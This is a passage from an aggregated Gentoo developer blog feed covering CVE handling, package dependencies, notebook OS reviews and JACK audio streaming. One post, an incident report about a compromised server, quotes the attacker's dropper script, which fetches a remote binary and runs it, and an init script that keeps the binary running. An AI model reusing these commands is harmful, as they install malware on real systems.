I don't think there is a silver bullet solution, but I think there are things we can do to improve the situation. What could be done is to coordinate and share the work. Debian, Red Hat and other distributions with stable/LTS versions could agree that their next versions are based on a specific Glibc version, and they could collaboratively work on providing patch sets to fix all the vulnerabilities in it. This already somehow happens with upstream projects providing long term support versions; the Linux kernel does that, for example. Doing that at scale would require vast organizational changes in the Linux distributions. They would have to agree on a roughly common timescale to start their stable versions.

What I'd consider the most crucial thing is to improve and streamline the information flow about vulnerabilities. When Google fixes a vulnerability in Chrome OS they should make sure this information is shared with other Linux distributions and the public. And they should know where and how they should share this information.

One mechanism that tries to organize the vulnerability process is the system of CVE ids. The idea is actually simple: Publicly known vulnerabilities get a fixed id and they are in a public database. GHOST is CVE-2015-0235 (the scheme will soon change because four digits aren't enough for all the vulnerabilities we find every year). I got my first CVEs assigned in 2007, so I have some experience with the CVE system, and it is rather mixed. Sometimes I briefly mention rather minor issues in a mailing list thread and a CVE gets assigned right away. Sometimes I explicitly ask for CVE assignments and never get an answer.

I would like to see us just assign CVEs for everything that even remotely looks like a security vulnerability. However, right now I think the process is too unreliable to deliver that. There are other public vulnerability databases like OSVDB; I have limited experience with them, so I can't judge if they'd be better suited. Unfortunately sometimes people hesitate to request CVE ids because others abuse the CVE system to count assigned CVEs and use this as a metric for how secure a product is. Such bad statistics are outright dangerous, because they give people an incentive to downplay vulnerabilities or withhold information about them.

This post was partly inspired by some discussions on oss-security.

Michal Hrusecky a.k.a. miska (homepage, bugs)
Introducing ZXDB (January 29, 2015, 07:23 UTC)

Lately I have been playing a lot with some cool technologies. I had a lot of fun, so I want to share some of it and at least point you to the interesting pieces of technology to check out. And it also inspired me to my new project which I would like to introduce with this blog post.

ZeroMQ & friends

Let’s start with ZeroMQ. It is a lightweight messaging library with a really nice API. And the tools around it? CZMQ brings an even nicer API, and there is also zproto, which lets you generate protocol-handling code and even state machines easily. You just describe the protocol and zproto will generate all the code for you. I know you might think that code generation is evil. And quite often it is. But this one is not :-) The generated code is nice, readable and it really helps with productivity. You don’t have to write copy&paste code and drown yourself in writing stuff that has been written a thousand times before. You can concentrate on the logic of your application – the only important part – and disregard all those irrelevant boring processing functions. So ZeroMQ in combination with zproto is one of the interesting things I’ve been playing with lately. And I would recommend you do the same :-)

TNT

Another interesting open-source project I’ve been playing with is TNTNET, TNTDB and CXXTools. It’s actually three different libraries, but they are under one umbrella. They also have a really nice API, this time in C++ compared to the C one of ZeroMQ.

TNTNET is a way to write web applications in C++. And as most web applications need a database, TNTDB is a database abstraction layer that lets you write applications that can easily be deployed against SQLite or MySQL or even PostgreSQL without any modifications to the code. And CXXTools is just a collection of handy utilities that fits in neither, but can be and is used by both.

ZXDB

Now let’s introduce my new project – ZXDB. It combines both. As I was writing some web application (in C++), I found it quite boring dealing with the database and doing all those selects, keeping data somewhere, doing updates and stuff. As it is boring and copy&paste and boring, I thought about abstracting it away a little, and I wrote an initial gsl template (gsl is the templating system zproto uses) that generates all the boring code for me.

Now I’m able to easily add or remove properties, and I don’t have to deal with the database directly as I have a nice class-based abstraction on top of it; this generated abstraction uses TNTDB to stay database independent. I was quite excited when I started playing with this. So much that now I’m even generating unit tests for those generated classes :-)

It is far from perfect and it is missing plenty of features, but it already does something, so it is time to ship it (it compiles, at least for me :-) ). I put it on GitHub alongside some instructions. If you are interested, go take a look. And if you get even more interested, patches are welcome ;-)

January 28, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
CGit (January 28, 2015, 05:26 UTC)

Dirty hack of the day:

A CGit Mirror of git.overlays.gentoo.org

I wonder if the update cronjob actually works ...

January 23, 2015
Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
A story of Dependencies (January 23, 2015, 03:41 UTC)

Yesterday I wanted to update a build chroot I have. And ... strangely ... there was a pile of new dependencies:

# emerge -upNDv world

These are the packages that would be merged, in order:

Calculating dependencies... done!
[ebuild     U  ] sys-devel/patch-2.7.2 [2.7.1-r3] USE="-static {-test} -xattr" 0 KiB
[ebuild     U  ] sys-devel/automake-wrapper-10 [9] 0 KiB
[ebuild  N     ] dev-libs/lzo-2.08-r1:2  USE="-examples -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-fonts/dejavu-2.34  USE="-X -fontforge" 0 KiB
[ebuild  N     ] dev-libs/gobject-introspection-common-1.42.0  0 KiB
[ebuild  N     ] media-libs/libpng-1.6.16:0/16  USE="-apng (-neon) -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-libs/vala-common-0.26.1  0 KiB
[ebuild     U  ] dev-libs/libltdl-2.4.5 [2.4.4] USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] virtual/ttf-fonts-1  0 KiB
[ebuild  N     ] x11-themes/hicolor-icon-theme-0.14  0 KiB
[ebuild  N     ] dev-perl/XML-NamespaceSupport-1.110.0-r1  0 KiB
[ebuild  N     ] dev-perl/XML-SAX-Base-1.80.0-r1  0 KiB
[ebuild  N     ] virtual/perl-Storable-2.490.0  0 KiB
[ebuild     U  ] sys-libs/readline-6.3_p8-r2 [6.3_p8-r1] USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild     U  ] app-shells/bash-4.3_p33-r1 [4.3_p33] USE="net nls (readline) -afs -bashlogger -examples -mem-scramble -plugins -vanilla" 0 KiB
[ebuild  N     ] media-libs/freetype-2.5.5:2  USE="adobe-cff bzip2 -X -auto-hinter -bindist -debug -doc -fontforge -harfbuzz -infinality -png -static-libs -utils" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-perl/XML-SAX-0.990.0-r1  0 KiB
[ebuild  N     ] dev-libs/libcroco-0.6.8-r1:0.6  USE="{-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-perl/XML-LibXML-2.1.400-r1  USE="{-test}" 0 KiB
[ebuild  N     ] dev-perl/XML-Simple-2.200.0-r1  0 KiB
[ebuild  N     ] x11-misc/icon-naming-utils-0.8.90  0 KiB
[ebuild  NS    ] sys-devel/automake-1.15:1.15 [1.13.4:1.13, 1.14.1:1.14] 0 KiB
[ebuild     U  ] sys-devel/libtool-2.4.5:2 [2.4.4:2] USE="-vanilla" 0 KiB
[ebuild  N     ] x11-proto/xproto-7.0.26  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/xextproto-7.3.0  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/inputproto-2.3.1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/damageproto-1.2.1-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/xtrans-1.3.5  USE="-doc" 0 KiB
[ebuild  N     ] x11-proto/renderproto-0.11.1-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-fonts/font-util-1.3.0  0 KiB
[ebuild  N     ] x11-misc/util-macros-1.19.0  0 KiB
[ebuild  N     ] x11-proto/compositeproto-0.4.2-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/recordproto-1.14.2-r1  USE="-doc" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libICE-1.0.9  USE="ipv6 -doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libSM-1.2.2-r1  USE="ipv6 uuid -doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/fixesproto-5.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/randrproto-1.4.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/kbproto-1.0.6-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-proto/xf86bigfontproto-1.2.0-r1  ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXau-1.0.8  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXdmcp-1.1.1-r1  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-libs/libpthread-stubs-0.3-r1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/pixman-0.32.6  USE="sse2 (-altivec) (-iwmmxt) (-loongson2f) -mmxext (-neon) -ssse3 -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  NS    ] app-text/docbook-xml-dtd-4.4-r2:4.4 [4.1.2-r6:4.1.2, 4.2-r2:4.2, 4.5-r1:4.5] 0 KiB
[ebuild  N     ] app-text/xmlto-0.0.26  USE="-latex" 0 KiB
[ebuild  N     ] sys-apps/dbus-1.8.12  USE="-X -debug -doc (-selinux) -static-libs -systemd {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] net-misc/curl-7.40.0  USE="ipv6 ssl -adns -idn -kerberos -ldap -metalink -rtmp -samba -ssh -static-libs {-test} -threads" ABI_X86="(64) -32 (-x32)" CURL_SSL="openssl -axtls -gnutls -nss -polarssl (-winssl)" 0 KiB
[ebuild  N     ] app-arch/libarchive-3.1.2-r1:0/13  USE="acl bzip2 e2fsprogs iconv lzma zlib -expat -lzo -nettle -static-libs -xattr" 0 KiB
[ebuild  N     ] dev-util/cmake-3.1.0  USE="ncurses -doc -emacs -qt4 (-qt5) {-test}" 0 KiB
[ebuild  N     ] media-gfx/graphite2-1.2.4-r1  USE="-perl {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-libs/fontconfig-2.11.1-r2:1.0  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-admin/eselect-fontconfig-1.1  0 KiB
[ebuild  N     ] dev-libs/gobject-introspection-1.42.0  USE="-cairo -doctool {-test}" PYTHON_TARGETS="python2_7" 0 KiB
[ebuild  N     ] dev-libs/atk-2.14.0  USE="introspection nls {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] dev-util/gdbus-codegen-2.42.1  PYTHON_TARGETS="python2_7 python3_3 -python3_4" 0 KiB
[ebuild  N     ] x11-proto/xcb-proto-1.11  ABI_X86="(64) -32 (-x32)" PYTHON_TARGETS="python2_7 python3_3 -python3_4" 0 KiB
[ebuild  N     ] x11-libs/libxcb-1.11-r1:0/1.11  USE="-doc (-selinux) -static-libs -xkb" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libX11-1.6.2  USE="ipv6 -doc -static-libs {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXext-1.3.3  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXfixes-5.0.1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXrender-0.9.8  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/cairo-1.12.18  USE="X glib svg (-aqua) -debug (-directfb) (-drm) (-gallium) (-gles2) -opengl -openvg (-qt4) -static-libs -valgrind -xcb -xlib-xcb" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXi-1.7.4  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/gdk-pixbuf-2.30.8:2  USE="X introspection -debug -jpeg -jpeg2k {-test} -tiff" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXcursor-1.1.14  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXdamage-1.1.4-r1  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXrandr-1.4.2  USE="-static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXcomposite-0.4.4-r1  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/libXtst-1.2.2  USE="-doc -static-libs" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-accessibility/at-spi2-core-2.14.1:2  USE="X introspection" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] app-accessibility/at-spi2-atk-2.14.1:2  USE="{-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] media-libs/harfbuzz-0.9.37:0/0.9.18  USE="cairo glib graphite introspection truetype -icu -static-libs {-test}" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/pango-1.36.8  USE="introspection -X -debug" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-libs/gtk+-2.24.25-r1:2  USE="introspection (-aqua) -cups -debug -examples {-test} -vim-syntax -xinerama" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] gnome-base/librsvg-2.40.6:2  USE="introspection -tools -vala" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] x11-themes/adwaita-icon-theme-3.14.1  USE="-branding" 0 KiB
[ebuild  N     ] x11-libs/gtk+-3.14.6:3  USE="X introspection (-aqua) -cloudprint -colord -cups -debug -examples {-test} -vim-syntax -wayland -xinerama" ABI_X86="(64) -32 (-x32)" 0 KiB
[ebuild  N     ] gnome-base/dconf-0.22.0  USE="X {-test}" 0 KiB

Total: 78 packages (6 upgrades, 70 new, 2 in new slots), Size of downloads: 0 KiB

The following USE changes are necessary to proceed:
 (see "package.use" in the portage(5) man page for more details)
# required by x11-libs/gtk+-2.24.25-r1
# required by x11-libs/gtk+-3.14.6
# required by gnome-base/dconf-0.22.0[X]
# required by dev-libs/glib-2.42.1
# required by media-libs/harfbuzz-0.9.37[glib]
# required by x11-libs/pango-1.36.8
# required by gnome-base/librsvg-2.40.6
# required by x11-themes/adwaita-icon-theme-3.14.1
=x11-libs/cairo-1.12.18 X
BOOM. That's heavy. There's gtk2, gtk3, most of X ... and things want to enable USE="X" ... what's going on?!
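(Portage and gentoolkit can show who drags in what; a sketch, using dev-libs/glib as the suspect atom:)

# show the dependency tree for the pending upgrade
emerge -upNDv --tree world

# and ask which installed packages need the suspect
equery depends dev-libs/glib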

After some experimenting with selective masking and tracing dependencies I figured out that it's dev-libs/glib that pulls in "everything". Eh?
ChangeLog says:
  21 Jan 2015; Pacho Ramos  -files/glib-2.12.12-fbsd.patch,
  -files/glib-2.36.4-znodelete.patch,
  -files/glib-2.37.x-external-gdbus-codegen.patch,
  -files/glib-2.38.2-configure.patch, -files/glib-2.38.2-sigaction.patch,
  -glib-2.38.2-r1.ebuild, -glib-2.40.0-r1.ebuild, glib-2.42.1.ebuild:
  Ensure dconf is present (#498436, #498474#c6), drop old
So now glib depends on dconf (which is actually not correct, but fixes some bugs for gtk desktop apps). dconf has USE="+X" in the ebuild, so it overrides profile settings, and pulls in the rest.
USE="-X" still pulls in dbus unconditionally, and ... dconf is needed by glib, and glib is needed by pkgconfig, so that would be mildly upsetting as every user would now have dconf and dbus installed. (Unless, of course, we switched pkgconfig to USE="internal-glib")

After a good long discussion on IRC with some good comments on the bugreport we figured out a solution that should work for all:
dconf ebuild is fixed to not set default useflags. So only desktop profiles or USE="X" set by users will pull in X-related dependencies. glib gets a dbus useflag, which is default-enabled on desktop profiles, so there the dependency chain works as desired. And for the no-desktop no-X usecase we have no extra dependencies, and no reason to be grumpy.
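(Until the fixed ebuilds arrive, an affected non-desktop user could also pin things locally; a sketch of /etc/portage/package.use entries matching the flags discussed above:)

# keep dconf from dragging X onto a headless box
gnome-base/dconf -X

# or cut glib out of pkgconfig's dependency chain entirely
dev-util/pkgconfig internal-glib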

This situation shows quite well how unintended side-effects may happen. The situation looked good for everyone on a desktop profile (and dconf is small enough to be tolerated as dependency). But on not-desktop profiles, suddenly, we're looking at a pile of 'wrong' dependencies, accidentally forced on everyone. Oops :)

In the end, all is well, and I'm still confused why writing a config file needs dbus and xml and stuff. But I guess that's called progress ...

January 21, 2015
Sven Vermeulen a.k.a. swift (homepage, bugs)
Old Gentoo system? Not a problem… (January 21, 2015, 21:05 UTC)

If you have a very old Gentoo system that you want to upgrade, you might have some issues with too old software and Portage which can’t just upgrade to a recent state. Although many methods exist to work around it, one that I have found to be very useful is to have access to old Portage snapshots. It often allows the administrator to upgrade the system in stages (say in 6-months blocks), perhaps not the entire world but at least the system set.

Finding old snapshots might be difficult though, so at one point I decided to create a list of old snapshots, two months apart, together with the GPG signature (so people can verify that the snapshot was not tampered with by me in an attempt to create a Gentoo botnet). I haven’t needed it in a while anymore, but I still try to update the list every two months, which I just did with the snapshot of January 20th this year.
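Using such a snapshot is straightforward; a sketch, with an illustrative URL and date (take the real ones from the list):

wget http://example.org/snapshots/portage-20100620.tar.bz2
wget http://example.org/snapshots/portage-20100620.tar.bz2.gpgsig
gpg --verify portage-20100620.tar.bz2.gpgsig portage-20100620.tar.bz2
# unpacks to /usr/portage; move the old tree aside first
tar -xjf portage-20100620.tar.bz2 -C /usr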

I hope it at least helps a few other admins out there.

Patrick Lauer a.k.a. bonsaikitten (homepage, bugs)
Demo Operating Systems on new hardware (January 21, 2015, 10:16 UTC)

Recently I got to interact with two Lenovo notebooks - an E445 with Ubuntu Demo preinstalled, and an E431 with Win8 Demo preinstalled.
Why do I say demo? Because these were completely unusable. Let me explain ...

The E445 is a very simple notebook - 14" crap display, slowest AMD APU they could find, 4GB RAM (3 usable due to graphics card stealing the rest). Slowest harddisk ever ;)
The E431 is pretty much the same form factor, but the slowest Intel CPU (random i3) and also 4GB RAM and a crap display.

On powerup the E445 spent about half an hour "initialising" and kinda installing whatever. Weird because you could do that before and deliver an instant-on disk image, but this whole thing hasn't been thought out.
The Ubuntu version it comes with (12.04 LTS I think?) is so old that the graphics drivers can't drive the display at native resolution out of the box. So your display will be a fuzzy 1024x768 upscaled to 1366x768. I consider this a demo because there are some obvious bugs - the black background glows purple, and there's random output from init scripts bleeding over the bootsplash. And then once you log in there's this ... hmm. Looks like a blend of MovieOS and a touchscreen UI, and it goes by the name of Unity. The whole mix is pretty much unusable, mostly because basic things like screen resolution are broken in ways that are not easy to fix.
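(The classic band-aid, for the record, is feeding X a modeline by hand; a sketch, where the output name LVDS1 and the exact modeline, here as printed by cvt 1366 768 on one box, will vary per machine:)

cvt 1366 768
xrandr --newmode "1368x768_60.00" 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync
xrandr --addmode LVDS1 "1368x768_60.00"
xrandr --output LVDS1 --mode "1368x768_60.00"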

The other device came with a Win8 demo. Out of the box it takes about 5 minutes to start, and then every app takes 30-60 seconds to start. It's brutally slow.
After boot about 2.5GB RAM are in use, so pretty much any action can trigger swapping. It's brutally slow. Oh wait, I already said that.
At some point it decided to update to 8.1, which took half an hour to download and about seven hours to install. WHAT TEH EFF!

The UI is ... MovieOS got drunk. A part is a kinda-touchscreen thingy, and the rest is even more confused. Localization is horribad (some parts are pictogram-only, some parts are text-only - and since this is a Chinese edition I wouldn't even know how to reboot it! Squiggly hat box squiggly bug ... or is it square squiggly star?). Oh my, this is just bad.
And I said demo, because shutdown doesn't. Looks like hibernate and shutdown got crosswired the wrong way?
There are random slowdowns doing basic tasks; even YouTube videos randomly stutter and glitch because the OS is still not ready for general use. And it's slow ... oh wait, I said that. So all in all, it's a nice showroom demo, but not useful.

Installing Gentoo was all in all pretty boring; with full KDE running, memory usage is near 500MB (compared to >2GB for the Win8 demo). Video runs smoothly, audio works. The Ethernet connection with r8169 works; WLAN with the BCM43142 requires broadcom-sta aka wl. A very, very bad driver - it'd be easier to not have this device built in.
Both the intel card in the E431 and the radeon in the E445 work well, although the HD 8550G needs the newest release of xf86-video-ati to work.

The E445 boots cleanly in BIOS mode; the E431 quietly fails (sigh) because of SecureBoot (sigh!) unless you actively disable it. Also, the E431 randomly tries to reset to factory defaults, or fails to boot with a "Fan Warning". Very shoddy, but usually smacking it with a hammer helps.

I'm a little bit sad that all new notebooks are so conservative with maximum amount of RAM, but on the upside the minimum is defined by Win8 Demo requirements. So most devices have 4GB RAM, which reminds me of 2008. Hmm.
Harddisks are getting slower and bigger - this seems to be mostly penny pinching. The harddisk in the R400 I had years ago was faster than the new ones!

And vendors should maybe either sell naked notebooks without an OS, or install something that is properly set up and preconfigured. And, maybe, include a proper recovery DVD so that the OS can be reinstalled? Especially as both these notebooks come with a DVD drive. I can't say whether the drive works because I lack media to test with, but it wastes space ...

(If you are a vendor, and want to have things tested or improved, feel free to send me free hardware and maybe consider compensating me for my time - it's not that hard to provide a good user experience, and it'll improve customer retention a lot!)

Getting compromised (January 21, 2015, 09:16 UTC)

Recently I was asked to set up a new machine. It had been minimally installed, network started, and then ignored for a day or two.

As I logged in I noticed a weird file in /root: n8005.tar
And 'file' said it's a shellscript. Hmmm ....

#!/bin/sh
PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
wget http://432.567.99.1/install/8005
chmod +x 8005
./8005


At this point my confidence in the machine had been ... compromised. "init 0" it is!
A reboot from a livecd later I was trying to figure out what the attacker was trying to do:
* An init script in /etc/init.d
#!/bin/sh
# chkconfig: 12345 90 90
# description: epnlmqmjph
### BEGIN INIT INFO
# Provides:             epnlmqmjph
# Required-Start:
# Required-Stop:
# Default-Start:        1 2 3 4 5
# Default-Stop:
# Short-Description:    epnlmqmjph
### END INIT INFO
case $1 in
start)
        /usr/bin/epnlmqmjph
        ;;
stop)
        ;;
*)
        /usr/bin/epnlmqmjph
        ;;
esac
* A file in /usr/bin
# file epnlmqmjph
epnlmqmjph: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, for GNU/Linux 2.6.9, not stripped

# md5sum epnlmqmjph
2cb5174e26c6782db94ea336696cfb7f  epnlmqmjph
* A file in /sbin, I think - I didn't write down everything, just archived it for later analysis:
# file bin_z 
bin_z: ERROR: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linkederror reading (Invalid argument)
# md5sum bin_z 
85c1c4a5ec7ce3efef5c5b20c5ded09c  bin_z
The only action I could do at this stage was wipe and reinstall, and so I did.
So this was quite educational, and a few minutes after reboot I saw a connection with putty as user agent in the ssh logs.
Sorry kid, not today ;)

There's a strong lesson in this: Do not use ssh passwords. Especially for root. A weak password can be accidentally bruteforced in a day or two!

sshd has an awesome feature: "PermitRootLogin without-password". If you rely on root login, at least avoid successful password logins!
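A minimal excerpt of what that looks like in /etc/ssh/sshd_config (plus turning password authentication off entirely, which is the safer default):

# root may log in, but only with a key
PermitRootLogin without-password
# no password logins for anyone
PasswordAuthentication no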

And I wonder how much accidental security running not-32bit not-CentOS gives ;)

January 19, 2015
Cinnamon 2.4 (January 19, 2015, 11:55 UTC)

A few weeks ago, I upgraded all Cinnamon ebuilds to 2.4 in tree. However, I could not get Cinnamon (the shell part) to actually work, as in show anything useful on my display. So this is a public service announcement: if you like Cinnamon and want to help with this issue, please visit bug #536374. For some reason, the hacks found in gnome-shell do not seem to work with Cinnamon's shell.

January 16, 2015
Michał Górny a.k.a. mgorny (homepage, bugs)
Surround sound over network with Windows 8 (January 16, 2015, 15:26 UTC)

I’ve got a notebook with some fancy HD Audio sound card (stereo!), and a single output jack — not a sane way to get surround sound (sure, cool kids use HDMI these days). Even worse, connecting an external amplifier to the jack results in catching a lot of electrical interference. Since I also have a PC which has surround speakers connected, I figured it would be a good idea to stream the audio over the network.

On non-Windows, the streaming would be trivial to set up. Likely PulseAudio on both machines, a few setup bits and done. If you are looking for a guide on how to do such a thing in Windows, you’ll likely end up setting up an icecast server listening to the stereo mix. Bad twice. Firstly, stereo-only. Secondly, poor latency. Now imagine playing a game or watching a movie with sound noticeably delayed after the picture (well, in the movie player you could at least play with the A/V delay to work around that). But there must be another way…

The ingredients

In order to get a working surround sound system, you need to have:

  1. two JACK2 servers — one on each computer,
  2. ASIO4ALL,
  3. and an ASIO-friendly virtual sound device such as VB-Audio Hi-Fi Cable.

Install the JACK server on the computer with speakers, and all the tools on the other machine.

Setting up the JACK slave (on speaker-PC)

I’m going to start with setting up the speaker-PC since it’s simpler. It can run basically any operating system, though I’m using Gentoo Linux for this guide. JACK is set up pretty much the same everywhere, the only difference being the audio driver used.

The choice of master vs. slave is pretty much arbitrary. The slave needs to either combine a regular audio driver with netadapter, or the net driver with audioadapter. I’ve used the former.

First, install JACK2. In Gentoo, it can be found in the pro-audio project overlay. A good idea is to disable D-Bus support (USE=-dbus) since I wasn’t able to get JACK running with it and the ebuild doesn’t build regular jackd when D-Bus support is enabled.

Afterwards, start JACK with the desired sound driver and a surround-capable device. You will want to specify a sample rate and bit depth too. Best fit it with the application you’re planning to use. For example:

$ jackd -R -d alsa -P surround40 -r 48000 -S

This starts the JACK daemon with real-time priority support (important for low latency), using ALSA playback device surround40 (4-speaker surround), 48 kHz sample rate and 16-bit samples.

Afterwards, load netadapter with matching number of capture channels, and connect them to the output channels:

$ jack_load netadapter -i '-C 4'
$ jack_connect netadapter:capture_1 system:playback_1
$ jack_connect netadapter:capture_2 system:playback_2
$ jack_connect netadapter:capture_3 system:playback_3
$ jack_connect netadapter:capture_4 system:playback_4

At this point, the slave is ready. JACK will wait for a master to start, and will forward any audio received from the master to the local sound card’s surround output. Since JACK2 supports zero-configuration networking, you don’t need to specify any IP addresses.
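The whole slave side fits in one small script; a sketch under the same assumptions as above (ALSA surround40 device, four channels):

#!/bin/sh
# Start the JACK slave and wire the network capture ports
# to the local surround outputs.
jackd -R -d alsa -P surround40 -r 48000 -S &
sleep 2    # give the server a moment to come up
jack_load netadapter -i '-C 4'
for i in 1 2 3 4; do
    jack_connect netadapter:capture_$i system:playback_$i
done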

Setting up the virtual device

After getting the slave up, it’s time to set up the sound source. After installing all the components, the first goal is to set up the virtual audio device. Once the Hi-Fi Cable package is installed (no need to reboot), the system should start seeing two new devices — a playback device called ‘Hi-Fi Cable Input’ and a recording device called ‘Hi-Fi Cable Output’. Now open the sound control panel applet and:

  1. select ‘Hi-Fi Cable Input’ as the default output device.
  2. Right-click it and configure speakers. Select whatever configuration is appropriate for your real speaker set (e.g. quad speakers).
  3. (Optionally) right-click it and open properties. On the advanced tab select sample rate and bit depth. Afterwards, open properties of the ‘Hi-Fi Cable Output’ recording device and set the same parameters.

[Screenshots: Control Panel sound settings with the virtual Hi-Fi Cable Input device; advanced Hi-Fi Cable Input device properties (sample rate and bit depth settings)]

As you may notice, even after setting the input to multiple speakers, the output will still be stereo. That’s a bug (limitation?) we’re going to work around soon…

Setting up the JACK master

Now that the device is ready, we need to start setting up JACK. On Windows, the ‘Jack Control’ GUI is probably the easiest way. Start with ‘Setup’. Ensure that the ‘portaudio’ driver is selected, and choose ‘ASIO::ASIO4ALL v2’ as both the input and output device. The right-arrow button to the right of the text inputs should provide a list of devices to select from. Additionally, select a sample rate matching the one set for the virtual device and the JACK slave.

[Screenshot: JACK setup window]

Now, we need to load the netmanager module. Similarly to the slave setup, this is done using jack_load. To get this fully automated, you can use the ‘Execute script after startup’ option under ‘Options’ (the right-arrow button is not helpful this time). Create a new .bat file somewhere, and put the following command inside:

jack_load netmanager

Save the file and select it as the post-startup script. Now the module will be automatically loaded every time you start JACK via Jack Control. You may also fine-tune some of the ‘Misc’ settings to fit your preferences. Then confirm with ‘Ok’ and click ‘Start’. If everything went well so far, after clicking ‘Connect’ you should see both ‘System’ and the slave’s hostname (assuming it is up and running). Do not connect anything yet, just verify that JACK sees the slave.

Connecting the virtual sound card to JACK

Now that the JACK is ready, it’s time to connect the virtual sound card to the remote host. The traditional way of doing that would be through connecting the local recording device (stereo mix or Virtual Cable Output) to the respective remote pins. However, that would mean just stereo. Instead, we have to cheat a little.

One of the fancy features of VB-Audio’s Virtual Hi-Fi Cable is that it supports ASIO-compatible sound processors. In other words, the sound from the virtual cable input is directed to an ASIO output port for processing. The good news is that the stripping to stereo occurs directly in the virtual cable output, so ASIO still gets all the channels. All we have to do is capture the sound there…

Find VB-Cable’s ‘ASIO Bridge’ and start it. If the button in the middle states ‘ASIO OFF’, switch it to enable ASIO. Then click on the ‘Select A.S.I.O. Device’ text below it and select ‘JackRouter’. If everything went well, ‘VBCABLE_AsioBridge’ should appear in the JACK connection panel.

[Screenshot: ASIO Bridge window]

The final touches

Now that everything’s in place, it’s just a matter of connecting the right pins. To avoid having to connect them manually every time, use the ‘Patchbay’ panel. First, use ‘Add’ on the left-hand side to add an output socket: select the ‘VBCABLE_AsioBridge’ client and keep clicking ‘Add plug’ for all the input channels. Then ‘Add’ on the right-hand side: select your remote host as the client and add all the output channels. Now select both new sockets and ‘Connect’.

[Screenshot: JACK patchbay setup]

Save your new patchbay definition somewhere, and ‘Activate’ it. If you did well, the connections window should now show connections between respective local and remote pins and you should be able to hear sound from the remote speakers.

[Screenshot: JACK connections window after setup]

Now you can open ‘Setup’ again, and on the ‘Options’ tab activate patchbay persistence. Select your newly created patchbay definition file and from now on, starting JACK should enable the patchbay, and the patchbay should ensure that the pins are connected every time they reappear.

Maintenance notes

First of all, you usually don’t need to set up an explicit connection between your virtual device and the real system audio device. On my system that connection is established automatically, so the sound reaches both the remote host and the local speakers. If that’s unwanted, just mute the sound card…

Secondly, note that now the virtual sound card is the default device, so applications will control its volume (both for remote and local speakers). If you want to mute the local speakers, you need to open the mixer and select your local sound card from device drop-down.

Thirdly, VBCABLE_AsioBridge likes to disappear occasionally when restarting JACK. If you don’t see it in the connections, just turn it off and on again (the ‘ASIO ON’ button) and it should reappear.

